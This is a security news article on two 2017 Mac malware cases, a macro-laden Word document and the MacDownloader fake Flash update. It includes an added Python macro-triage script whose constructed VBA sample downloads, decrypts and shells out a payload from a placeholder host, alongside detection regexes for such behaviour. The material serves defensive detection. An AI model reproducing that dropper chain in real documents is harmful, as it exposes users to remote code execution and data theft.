Word Macros and fake Flash updates now target Mac users

Feb 9, 2017 13:47 GMT

Just because Macs aren’t hit by malware that often doesn’t mean it never happens, as the new Mac malware detected earlier this week proves.

Mac security researchers detected two separate instances of macOS malware this week. One of them relies on an old Windows technique: a malicious Microsoft Word document abusing macros, titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace,” was distributed to victims.

When Mac users opened the document in a Word application configured to allow macros and ignore warnings, the embedded macro automatically checked that the Little Snitch firewall wasn’t running, notes Patrick Wardle, director of security firm Synack.

It then downloaded an encrypted payload, decrypted it with a hard-coded key and executed it. The macro code appears to have been taken from EmPyre, an open-source exploit framework for Macs. By the time specialists analyzed the document, the site the payload was downloaded from was no longer serving it, so it is impossible to tell exactly what the payload did.

Given how closely the code resembles EmPyre, the malware could very well monitor webcams, steal passwords and encryption keys, and access browser history logs.

While this type of attack is nowadays considered primitive, especially since Office itself warns clearly about potential viruses before letting macros run, some Mac users were still affected.
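The behaviour chain described above (auto-executing macro, check for a security tool, download of an encrypted blob, hard-coded key, execution) is what a defender’s macro triage looks for. The following is an added example, not code from the article or from Synack: a small indicator scorer over extracted VBA source, run against two constructed macro snippets. The macro text, function names (IsRunning, Decrypt) and URL are invented for illustration and are not working VBA.

```python
import re

# Constructed VBA text modelled on the chain the article describes; the helper
# names are made up and this snippet does nothing if pasted into Word.
SAMPLE_MACRO = """
Sub AutoOpen()
    If Not IsRunning("Little Snitch") Then
        Set http = CreateObject("MSXML2.XMLHTTP")
        http.Open "GET", "http://example.invalid/payload.bin", False
        key = "0123456789abcdef"
        data = Decrypt(http.responseText, key)
        Shell data
    End If
End Sub
"""

# Constructed harmless macro for comparison: auto-runs, but only formats text.
BENIGN_MACRO = """
Sub AutoOpen()
    ActiveDocument.Range.Font.Size = 12
End Sub
"""

# One regex per behaviour; each is a coarse heuristic, not a signature.
INDICATORS = {
    "auto_exec": r"\b(AutoOpen|Document_Open|AutoExec)\b",
    "security_tool_check": r"(?i)little\s*snitch|pgrep|ps\s+-ax",
    "download": r"(?i)XMLHTTP|URLDownloadToFile|https?://",
    "hardcoded_key": r"(?i)\bkey\s*=\s*\"[0-9a-f]{8,}\"",
    "decrypt": r"(?i)\bdecrypt|\bxor\b",
    "execute": r"(?i)\bShell\b|WScript\.Shell|MacScript",
}


def triage_macro(source):
    """Return a verdict and the list of behaviours seen in macro source text."""
    hits = {name: bool(re.search(pat, source)) for name, pat in INDICATORS.items()}
    # Auto-run + download + execute is the core dropper chain; otherwise
    # require several indicators so a lone AutoOpen is not flagged.
    chain = hits["auto_exec"] and hits["download"] and hits["execute"]
    verdict = "suspicious" if chain or sum(hits.values()) >= 4 else "likely benign"
    return {"verdict": verdict, "indicators": sorted(k for k, v in hits.items() if v)}


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage_macro(src))
```

In practice the source text would come from a macro extractor such as olevba rather than an inline string.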

The fake Flash Player update

The other malware instance discovered this week also relied on classic Windows tactics, faking a regular software update dialog that downloads malicious code rather than the app’s actual update. The MacDownloader virus presented itself as an Adobe Flash Player update, which, as everyone knows, are annoying. This is what the attackers were counting on, of course: people either dismiss such updates or just press yes to get rid of them once and for all.

In reality, users gave the green light for the malware to harvest the user’s keychain, phish usernames and passwords, or collect private, sensitive data, all of which was sent back to the attacker. While this attack is a bit more sophisticated than the first one, it’s still primitive compared to what Windows users confront.

It pretty much relied on people clicking a link on a website to update Flash Player and then running the downloaded file. It’s been said a million times over, and it looks like it needs to be said a million times more – if you’re going to download any software, or a software update for that matter, always go directly to the producer’s site. The same goes for following links where you’re then asked for a username and password: type in the URL yourself rather than relying on an email you received, or you might fall victim to a phishing attack.